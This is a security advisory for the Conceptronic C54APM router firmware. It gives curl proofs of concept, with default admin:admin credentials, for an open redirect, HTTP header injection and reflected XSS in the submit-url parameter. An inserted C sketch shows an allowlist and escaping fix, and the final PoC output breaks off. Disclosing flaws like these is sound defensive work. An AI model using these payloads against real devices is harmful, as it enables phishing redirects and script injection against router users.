Device description:
Device datasheet can be downloaded from the product webpage:
http://www.conceptronic.net/es/download_list.php?stype=3&productid=341
Vulnerable firmware releases:
Device Name: C54APM
Vendor: Conceptronic
Hardware Version: v2
Runtime Code Version: v1.26
Vulnerability overview:
1. URL redirection:
• If the submit-url parameter is provided to /goform/formWlSiteSurvey, a Location header is put in the response with that value, so the browser is redirected to an attacker-chosen URL (open redirect).
• Note that the refresh parameter is needed with the value Refresh.
• A possible fix would be a fixed redirect to /wlsurvey2.asp, as it is the only place where this is used, but there are many other better solutions.
curl -v "http://admin:admin@192.168.2.1/goform/formWlSiteSurvey?refresh=Refresh&submit-url=http://google.com/"
* About to connect() to 192.168.2.1 port 80 (#0)
* Trying 192.168.2.1...
* Adding handle: conn: 0xcb02a0
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0xcb02a0) send_pipe: 1, recv_pipe: 0
* Connected to 192.168.2.1 (192.168.2.1) port 80 (#0)
* Server auth using Basic with user 'admin'
> GET /goform/formWlSiteSurvey?refresh=Refresh&submit-url=http://google.com/ HTTP/1.1
> Authorization: Basic YWRtaW46YWRtaW4=
> User-Agent: curl/7.30.0
> Host: 192.168.2.1
> Accept: */*
>
* HTTP 1.0, assume close after body
< HTTP/1.0 302 Redirect
< Server: GoAhead-Webs
< Date: Sat Jan 1 00:08:34 2000
< Pragma: no-cache
< Cache-Control: no-cache
< Content-Type: text/html
< Location: http://google.com/
<
<html><head></head><body>
This document has moved to a new <a href="http://google.com/">location</a>.
Please update your documents to reflect the new location.
</body></html>
* Closing connection 0
2. HTTP header injection:
• The parameter submit-url in form /goform/formWlSiteSurvey is not properly validated, so newline characters can be used for HTTP header injection and not only redirection.
• Note that the refresh parameter is needed with the value Refresh.
• A possible solution is explained in the previous vulnerability.
curl -v "http://admin:admin@192.168.2.1/goform/formWlSiteSurvey?refresh=Refresh&submit-url=/wlsurvey2.asp%0d%0aNew%20Header:%20PWND"
* About to connect() to 192.168.2.1 port 80 (#0)
* Trying 192.168.2.1...
* Adding handle: conn: 0x1e5f340
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0x1e5f340) send_pipe: 1, recv_pipe: 0
* Connected to 192.168.2.1 (192.168.2.1) port 80 (#0)
* Server auth using Basic with user 'admin'
> GET /goform/formWlSiteSurvey?refresh=Refresh&submit-url=/wlsurvey2.asp%0d%0aNew%20Header:%20PWND HTTP/1.1
> Authorization: Basic YWRtaW46YWRtaW4=
> User-Agent: curl/7.30.0
> Host: 192.168.2.1
> Accept: */*
>
* HTTP 1.0, assume close after body
< HTTP/1.0 302 Redirect
< Server: GoAhead-Webs
< Date: Sat Jan 1 00:26:07 2000
< Pragma: no-cache
< Cache-Control: no-cache
< Content-Type: text/html
< Location: http://192.168.2.1/wlsurvey2.asp
< New Header: PWND
<
<html><head></head><body>
This document has moved to a new <a href="http://192.168.2.1/wlsurvey2.asp
New Header: PWND">location</a>.
Please update your documents to reflect the new location.
</body></html>
* Closing connection 0
3. Reflected XSS:
• The parameter submit-url in form /goform/formWlSiteSurvey is not properly validated, so HTML tags can be injected into the returned web page (the value is echoed unescaped in the href of the redirect body).
• Note that the refresh parameter is needed with the value Refresh.
• A possible solution is explained in vulnerability number 1.
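The following C sketch is an added example of the fix suggested in vulnerability 1; it is not code from this advisory, from Conceptronic or from the GoAhead web server. It shows how one validation routine for submit-url closes all three issues at once: the redirect target is taken from an allowlist of local pages (assumed here to contain only /wlsurvey2.asp) and otherwise falls back to the fixed page, control characters (CR/LF) are rejected before the value can reach a header, and the target is HTML-escaped before being echoed in the body. All function names and the allowlist are my own assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Fixed fallback target, as suggested in the advisory. */
#define DEFAULT_TARGET "/wlsurvey2.asp"

/* Assumed allowlist of local pages the survey form may return to. */
static const char *const allowed_targets[] = {
    "/wlsurvey2.asp",
    NULL
};

/* Returns 1 if s contains CR, LF or any other control character
   (the class of input used for header injection). */
int has_control_chars(const char *s) {
    for (; *s; s++) {
        if (iscntrl((unsigned char)*s)) return 1;
    }
    return 0;
}

/* Returns 1 if s would leave the device: an absolute URL with a
   scheme ("http://..."), or a protocol-relative "//host" form.
   Some browsers also treat a leading backslash like a slash. */
int is_absolute_url(const char *s) {
    if (s[0] == '/' && s[1] == '/') return 1;
    if (s[0] == '\\') return 1;
    for (const char *p = s; *p; p++) {
        if (*p == ':') return 1;                       /* scheme separator */
        if (!isalnum((unsigned char)*p) && *p != '+' &&
            *p != '-' && *p != '.') return 0;          /* not a scheme char */
    }
    return 0;
}

/* Choose the redirect target. Only an exact allowlisted local path is
   honoured; control characters, absolute URLs and unknown paths all
   fall back to the fixed page, so the Location header can never carry
   attacker-controlled bytes. */
const char *safe_redirect_target(const char *submit_url) {
    if (submit_url == NULL) return DEFAULT_TARGET;
    if (has_control_chars(submit_url) || is_absolute_url(submit_url))
        return DEFAULT_TARGET;
    for (const char *const *p = allowed_targets; *p; p++) {
        if (strcmp(submit_url, *p) == 0) return *p;
    }
    return DEFAULT_TARGET;
}

/* HTML-escape in into out. Returns bytes written (excluding NUL) or -1
   if out is too small; nothing is written beyond outlen. */
int html_escape(const char *in, char *out, size_t outlen) {
    size_t n = 0;
    if (outlen == 0) return -1;
    for (; *in; in++) {
        char one[2] = { *in, '\0' };
        const char *rep;
        switch (*in) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (n + rl >= outlen) return -1;
        memcpy(out + n, rep, rl);
        n += rl;
    }
    out[n] = '\0';
    return (int)n;
}

/* Build a 302 response in the shape the device sends, with the validated
   target in the Location header and the escaped target in the body.
   Returns the response length or -1 on error. */
int build_redirect_response(const char *submit_url, char *buf, size_t buflen) {
    const char *target = safe_redirect_target(submit_url);
    char esc[256];
    /* Escaping an allowlisted path is belt-and-braces; it matters if the
       allowlist is ever extended with values that contain '"' or '<'. */
    if (html_escape(target, esc, sizeof esc) < 0) return -1;
    int n = snprintf(buf, buflen,
        "HTTP/1.0 302 Redirect\r\n"
        "Location: %s\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
        "<html><head></head><body>\r\n"
        "This document has moved to a new <a href=\"%s\">location</a>.\r\n"
        "Please update your documents to reflect the new location.\r\n"
        "</body></html>\r\n", target, esc);
    if (n < 0 || (size_t)n >= buflen) return -1;
    return n;
}

int main(void) {
    /* Constructed inputs mirroring the advisory's three PoC values. */
    const char *inputs[] = {
        "/wlsurvey2.asp",
        "http://google.com/",
        "/wlsurvey2.asp\r\nNew Header: PWND",
        "\"><script>alert('XSSed')</script>",
    };
    char buf[1024];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        if (build_redirect_response(inputs[i], buf, sizeof buf) > 0)
            printf("--- input %zu ---\n%s\n", i, buf);
    }
    return 0;
}
```

With this in place all three PoC values produce the same response, a redirect to /wlsurvey2.asp, because the allowlist decides the target and the raw parameter never reaches the header or the body. The separate has_control_chars and is_absolute_url checks are kept so that a device log or a rejected-input counter can say which class of input was seen.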
curl -v 'http://admin:admin@192.168.2.1/goform/formWlSiteSurvey?refresh=Refresh&submit-url="><script>alert('XSSed')</script>'
* About to connect() to 192.168.2.1 port 80 (#0)
* Trying 192.168.2.1...
* Adding handle: conn: 0x123b2f0
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0x123b2f0) send_pipe: 1, recv_pipe: 0
* Connected to 192.168.2.1 (192.168.2.1) port 80 (#0)